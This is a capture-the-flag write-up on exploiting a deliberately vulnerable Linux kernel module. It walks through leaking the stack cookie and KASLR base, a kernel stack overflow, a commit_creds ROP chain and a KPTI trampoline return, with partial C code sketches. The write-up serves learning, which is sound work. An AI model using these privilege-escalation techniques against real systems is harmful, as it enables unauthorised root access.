This writeup covers my first foray into Linux kernel exploitation. Disclaimer: I just started learning kernel pwn this month, so some information here might be incomplete. I plan to improve it after I learn a little more about the kernel.
Since the CTF was aimed at beginner-to-intermediate players, it is safe to assume that this is an easy, introductory kernel pwn challenge. We are given the remote server details + challenge files in easy_kernel.tar.gz.
We were given a bunch of files which help set up the kernel environment. This includes important files and directories such as bzImage, vuln.ko and fs. The following is a brief description of what the given files are:
bzImage: the compressed Linux kernel. We need to extract this into a vmlinux kernel ELF binary to be used for debugging.
initramfs.cpio.gz: the Linux file system, compressed with cpio and gzip.
fs: the decompressed version of the Linux file system used. The usual Linux files/directories such as /bin/, /etc + other challenge files can be located here.
vuln.ko: the vulnerable Linux kernel driver. This is the target which needs to be exploited.
First off, we need to extract the kernel ELF from bzImage using a script: extract_image.sh. This step is needed since we want to get some ROP gadgets that we can use later (the search takes a long time since the kernel is large, so getting the ROP gadgets early will save us some time in the long run).
The other .sh files are bash scripts which automate things such as showing how the pow is calculated, starting the QEMU emulator and rebuilding/compressing the file system.
Notable flags:
-cpu: specifies the CPU model. Some kernel mitigations are also enabled here (in this case: +smep, +smap).
-kernel: specifies which kernel image file to use.
-initrd: specifies the compressed file system.
-append: specifies additional boot options, i.e. the kernel command line. From this flag we can see that kaslr is enabled.
A brief description of the kernel mitigations that are present for this challenge (I need to elaborate on this further, still trying to fully understand how they are used):
SMEP: this CPU feature treats all userland pages as non-executable while the CPU is in kernel mode. Basically kills ret2usr shellcode.
SMAP: complementing SMEP, this feature treats all userland pages as non-accessible while the CPU is in kernel mode, which means they cannot be read or written either.
KASLR: similar to userspace ASLR, it randomizes the base address where the kernel is loaded each time the system is booted.
KPTI: kernel page-table isolation works by better isolating user space and kernel space memory. The qemu launch script doesn't explicitly mention kpti, but according to the challenge author, newer kernel versions have it by default.
Kernel debugging is painful (at least for me who is just getting started with it), so modifying the kernel environment will give us an easier time while developing an exploit. Here are some of the things that I revised in the qemu launch script:
-s flag: shorthand for -gdb tcp::1234, i.e. open a gdbserver on TCP port 1234. Needed for remote debugging.
kaslr: disabled by changing the -append argument to nokaslr.
I also commented out a line in the fs/init file, basically allowing us to run as root inside the VM.
Kernel modules are loosely analogous to userspace libraries like libc.so.6. Modules/drivers are loaded into kernel space and run with ring-zero privileges. Userspace code can interact with a kernel module by first acquiring a handle to the device file it exposes, then reading/writing data through various channels (read/write/ioctl/etc.).
For a better explanation, I suggest reading: https://blog.sourcerer.io/writing-a-simple-linux-kernel-module-d9dc3762c234
Like what we would normally do with an ELF binary, we can begin by analyzing the module with Ghidra. Here is the function listing:
init_func and exit_func can be seen as the entry and exit points for the module, respectively.
init_func registers a device file named /proc/pwn_device, and we will be interacting with this file to exploit the module.
sopen simply prints the string "Device opened" when we successfully open the device file.
The sread functionality simply returns the string "Welcome to this kernel pwn series\x00" when we do a SYS_read call on the file descriptor for /proc/pwn_device. It does this by copying the string from the kernel stack into a userspace buffer that we provide.
An important thing to note is that we control not only the buffer address but also how many bytes are read. Since we control bytes_to_read, we can read past the welcome string into the rest of the kernel stack, leaking values that allow us to bypass KASLR.
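A minimal sketch of how such an over-read could look from userspace. It assumes fd is a descriptor obtained by opening /proc/pwn_device; the helper names read_leak and dump_leak and the 32-word buffer size are my own choices for illustration, not taken from the challenge files.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <unistd.h>

#define LEAK_WORDS 32 /* 256 bytes viewed as 8-byte words (illustrative size) */

/* Ask the device for more bytes than the welcome string holds.
 * Returns the number of complete 8-byte words read, or 0 on error. */
static size_t read_leak(int fd, uint64_t leak[LEAK_WORDS])
{
    assert(leak != NULL);
    ssize_t n = read(fd, leak, LEAK_WORDS * sizeof(uint64_t));
    if (n < 0) {
        perror("read");
        return 0;
    }
    return (size_t)n / sizeof(uint64_t);
}

/* Print every leaked word with its index so that kernel pointers and
 * the stack cookie are easy to spot by eye. */
static void dump_leak(const uint64_t *leak, size_t words)
{
    for (size_t i = 0; i < words; i++)
        printf("leak[%2zu] = 0x%016llx\n", i, (unsigned long long)leak[i]);
}
```

Viewing the buffer as 8-byte words makes it easy to refer to individual leaked values by index when comparing against the debugger.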
This is what the stack looks like before the call to copy_user_generic_unrolled. We can see the welcome string, some kernel addresses and the kernel stack cookie. We will be retrieving these values later on.
sioctl allows us to change the value of the MaxBuffer variable when we provide a cmd value of 0x20. This seems really suspicious.
Now here is the juicy part: swrite copies data from userspace and stores it into kernel_buffer, which is on the kernel stack. Since we can again control bytes_to_copy and, more importantly, MaxBuffer, we can induce a buffer overflow. We don't have to worry about the cookie, since we can leak it from sread. After that, we have instruction pointer control in the kernel.
First off, I reused some template code which helps preserve the state of some registers. This will be useful later for when we want to return from kernel-space back to userland.
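A sketch of what such a state-saving helper commonly looks like. This is not the exact template I reused: the variable names are illustrative, and the x86-64 guard and the compiler builtin for reading RFLAGS are my own choices for this example.

```c
#include <assert.h>
#include <stdint.h>

/* Userland register values that the iretq frame will need later. */
static uint64_t user_cs, user_ss, user_sp, user_rflags;

/* Record the current userland segment selectors, stack pointer and flags.
 * Returns 0 on success, or -1 when not compiled for x86-64. */
static int save_state(void)
{
#if defined(__x86_64__)
    __asm__ volatile("mov %%cs, %0" : "=r"(user_cs));
    __asm__ volatile("mov %%ss, %0" : "=r"(user_ss));
    __asm__ volatile("mov %%rsp, %0" : "=r"(user_sp));
    /* GCC/Clang builtin; avoids a hand-written pushfq/pop pair. */
    user_rflags = __builtin_ia32_readeflags_u64();
    /* A userland code selector always carries privilege level 3. */
    assert((user_cs & 3) == 3);
    return 0;
#else
    return -1;
#endif
}
```

The helper should be called once at the start of the exploit, before touching the device, so that the saved values describe a sane userland context.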
Next, we open a handle to /proc/pwn_device, then proceed to read from it.
We successfully read 256 bytes from the device, which include important kernel addresses and the cookie value. After a while of figuring out which addresses we can reliably use, I settled on the ones at indexes 14 and 18. Since kaslr was off while debugging, I calculated the offset of the leaked address from the kernel base through the following process:
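A minimal sketch of this kind of calculation, under stated assumptions: 0xffffffff81000000 is the usual x86-64 kernel text base when KASLR is off, the leaked address comes from one of the stable leak slots, and the function names are hypothetical. The concrete addresses must come from your own debugging session.

```c
#include <assert.h>
#include <stdint.h>

/* Usual x86-64 kernel text base with nokaslr (assumption, verify in gdb). */
#define NOKASLR_KERNEL_BASE 0xffffffff81000000ULL

/* Step 1 (nokaslr run): distance between a leaked pointer and the base. */
static uint64_t leak_offset(uint64_t leaked_nokaslr)
{
    assert(leaked_nokaslr >= NOKASLR_KERNEL_BASE);
    return leaked_nokaslr - NOKASLR_KERNEL_BASE;
}

/* Step 2 (kaslr run): the same slot minus the same offset gives the
 * randomized base for this boot. */
static uint64_t kernel_base_from_leak(uint64_t leaked, uint64_t offset)
{
    assert(leaked >= offset);
    return leaked - offset;
}

/* Cheap sanity check: the base lives in the top 2 GiB of the address
 * space and its low 20 bits are zero. */
static int looks_like_kernel_base(uint64_t base)
{
    return base >= 0xffffffff80000000ULL && (base & 0xfffffULL) == 0;
}
```

Once the base is known, any other kernel symbol can be located by adding its nokaslr offset to the base.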
Here is what our exploit currently looks like:
It simply retrieves values from the leak and calculates the base address of the kernel. After that, we send an ioctl call to overwrite MaxBuffer, allowing us to perform a buffer overflow when we write to the device. As we can see, we have triggered a kernel panic since we have overwritten the kernel stack cookie.
When disassembling the swrite function, we can see that it stores the cookie on the stack at [rsp + 0x80]:
In theory, the cookie sits at index 16 (0x80/8) of our payload when counted in 8-byte words. To test the idea, I wrote the following code:
Before the call to copy_user_generic_unrolled, the stack looks like this:
After our payload has been written:
We seem to be correct. Notice that what follows the cookie is some value (0x80), then the return address 0xffffffff8123e2e7, which we can see in the following screenshot:
I made a small adjustment to my payload: it preserves the kernel stack cookie, replaces the value next to it with a dummy, then overwrites the return address:
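The layout can be sketched roughly as follows. This is an illustration rather than my exact exploit code: the function name build_overflow is hypothetical, and the indexes follow the stack dump above (cookie at word 16, one saved value, return address at word 18).

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define COOKIE_IDX 16 /* 0x80 / 8, from the swrite disassembly */
#define RET_IDX    18 /* cookie, one saved value, then the return address */

/* Fill payload[] so that the cookie survives and the saved return address
 * is replaced. Returns the number of bytes to pass to write(). */
static size_t build_overflow(uint64_t *payload, size_t cap_words,
                             uint64_t cookie, uint64_t ret_addr)
{
    assert(payload != NULL && cap_words > RET_IDX);
    for (size_t i = 0; i < COOKIE_IDX; i++)
        payload[i] = 0x4141414141414141ULL; /* filler for kernel_buffer */
    payload[COOKIE_IDX]     = cookie;       /* leaked earlier via sread */
    payload[COOKIE_IDX + 1] = 0;            /* dummy for the saved value */
    payload[RET_IDX]        = ret_addr;     /* new return address */
    return (RET_IDX + 1) * sizeof(uint64_t);
}
```

Passing a recognizable invalid value as ret_addr first is a quick way to confirm control of RIP before building a full chain.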
Running the exploit causes a "general protection fault in user access. non-canonical address" error, since we have replaced RIP with an invalid address:
Now that we can control the kernel instruction pointer, our next phase should be escalating privileges.
Unlike userland exploits, in which our target is to spawn a shell, the goal for kernel exploits is different: to escalate the privileges of the running process (the exploit) from some basic user to root, then spawn a root shell. To do this, we take advantage of the task_struct structure:
The kernel tracks the privileges + other additional data of every running process. We are interested in the process credentials. Taking a look at the cred struct reveals our key targets:
The cred struct contains the effective UID (euid) of the task. If we were somehow able to overwrite this value with 0, we would have root privs. To do this, we use two kernel APIs: commit_creds and prepare_kernel_cred.
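commit_creds: installs the given cred struct as the credentials of the current task.
prepare_kernel_cred: builds a new cred struct. If we pass NULL/0 as the reference struct argument, it will return a cred struct with root privs.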
Since these functions are part of the kernel, we can include them in the list of addresses that we want to leak:
The next step of our payload will be to construct a ROP chain that basically calls commit_creds(prepare_kernel_cred(0)).
For this part, I mostly relied on writeups to know which gadgets to use. Initially my exploit code looked like this:
The idea was that after calling prepare_kernel_cred(0), a pointer to the resulting cred struct is returned in rax. We need a way to move it from rax into rdi, passing it as an argument to commit_creds. But there is no ROP gadget that does exactly that. Instead we did the following:
After that bit, we proceed to the next ROP gadget, which calls swapgs to swap the GS register from kernel mode to user mode. Then we continue to call iretq, which allows us to return to user mode.
The problem with this approach is that I wasn't able to return to userland properly. This becomes clear after we return to a userland function: we still see some kernel pointers/addresses on the stack:
The reason is KPTI. Even though we have already returned execution to user mode, the page tables in use are still the kernel's, with all the pages in userland marked as non-executable.
To bypass KPTI, I used a method called the KPTI trampoline. This method is based on the idea that if a syscall returns normally, there must be a piece of code in the kernel that swaps the page tables back to the userland ones, so we will try to reuse that code for our purpose. That piece of code is our KPTI trampoline, and what it does is swap the page tables, then execute swapgs and iretq.
Our kpti_trampoline resides in the function swapgs_restore_regs_and_return_to_usermode().
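A hedged sketch of how the tail of a ROP chain that returns through the trampoline is commonly laid out. The struct and function names are hypothetical, and the two filler words assume the commonly analysed builds where the entry point skips the initial register pops and the code ends with two pops before swapgs and iretq. The exact entry offset inside swapgs_restore_regs_and_return_to_usermode depends on the kernel build and must be checked in the disassembly.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Userland context to resume, e.g. the values recorded before the exploit. */
struct user_frame {
    uint64_t rip, cs, rflags, sp, ss;
};

/* Append the trampoline return sequence to chain[] starting at index i.
 * trampoline_entry = address inside
 * swapgs_restore_regs_and_return_to_usermode, past its initial pops.
 * Returns the index of the next free slot. */
static size_t append_kpti_return(uint64_t *chain, size_t i,
                                 uint64_t trampoline_entry,
                                 const struct user_frame *f)
{
    assert(chain != NULL && f != NULL);
    chain[i++] = trampoline_entry;
    chain[i++] = 0;         /* filler consumed by the first trailing pop */
    chain[i++] = 0;         /* filler consumed by the second trailing pop */
    chain[i++] = f->rip;    /* iretq frame: RIP, CS, RFLAGS, RSP, SS */
    chain[i++] = f->cs;
    chain[i++] = f->rflags;
    chain[i++] = f->sp;
    chain[i++] = f->ss;
    return i;
}
```

Here rip would point at a userland function that spawns the shell, so that execution resumes there with the userland page tables restored.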